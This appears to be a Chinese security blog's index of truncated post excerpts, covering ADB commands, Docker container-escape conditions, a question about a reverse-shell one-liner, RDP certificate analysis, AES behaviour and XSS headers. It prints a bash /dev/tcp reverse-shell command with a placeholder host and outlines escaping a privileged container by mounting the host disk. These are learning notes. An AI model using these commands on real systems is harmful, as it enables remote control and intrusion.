常用的ADB调试指令： 启动和停止ADB服务 adb start-server：启动ADB服务。 adb kill-server：停止ADB服务。 设备连接管理 adb devices：列出所有已连接的Android设备或模拟器。 adb connect <device-ip>:<port>：通过T

一、危险配置 1. Privileged特权模式 利用条件：容器以特权模式运行 docker run --privileged 以特权模式运行的容器可以访问宿主机上的所有设备。 可以在容器中挂载宿主机的磁盘，然后将根目录切换过去。 2. SYS_ADMIN 利用条件： 以root身份运行容器。 使用

今天在学习反弹shell，遇到一个经典的构造： /bin/bash -i &> /dev/tcp/host/port 0>&1 对语句最后的0>&1我百思不得其解，为什么标准输入重定向到标准输出，攻击端输入的指定就到本机来了呢？标准输入指的是本机键盘输入吗？键盘输入重定向到屏幕不应该就是默认的吗？这

本文记录一次使用Wireshark分析RDP证书的过程，这次遇到的证书比较特殊，是服务器专有证书（Server Proprietary Certificate），不能直接使用X.509格式的方式查看，当时为了分析这个证书花了不少时间。 下面记录一下分析过程，不想看过程可以直接跳到第三章节看快速判断方

想研究的课题是容器的渗透，一大方向就是容器逃逸。那么逃逸前自然需要判断是否处在容器中。那么就需要了解容器有哪些特征。假设进入一台远程服务器，通过何种手段开源判断此环境是否在容器之中。 容器虚拟技术有很多，最主流的就是Docker，也比较方便搭建实验环境。所以就先研究Docker的容器特征。手边刚好有

使用宝塔自带的php扩展安装功能，安装memcached失败，截取报错信息最后一段：

使用pip安装sqlmap遇到问题，报错信息：

某次在使用AES在线加密网站的时候遇到了两个问题： 相同明文和密钥的情况下，每次加密结果不一致，但都可以正常解密出相同的明文。 密钥长度无需指定，甚至用空密钥也可以。 示例网站：在线AES加密 | AES解密 - 在线工具 (sojson.com) 密文内容会变，base64 编码，开头一段总是固定

浏览器兼容模式是什么？ 浏览器的兼容模式是一种解决旧浏览器无法正确显示新网站的方案。浏览器检测到网站使用了新的 HTML 或 CSS 特性时，可能切换到兼容模式。在兼容模式下，浏览器使用旧的渲染引擎，以确保新网站能够在旧浏览器或旧网站上正确显示。尽管兼容模式可以解决兼容性问题，但它会导致浏览器性能下

X-XSS-Protection X-XSS-Protection是一种内置于浏览器中的安全防护模块，在IE浏览器中称为XSS Filter，在Chrome浏览器中称为XSS Auditor。该模块的作用是在检测到跨站脚本攻击（XSS）时，停止加载页面，从而保护用户的信息和系统安全。 然而，随着安全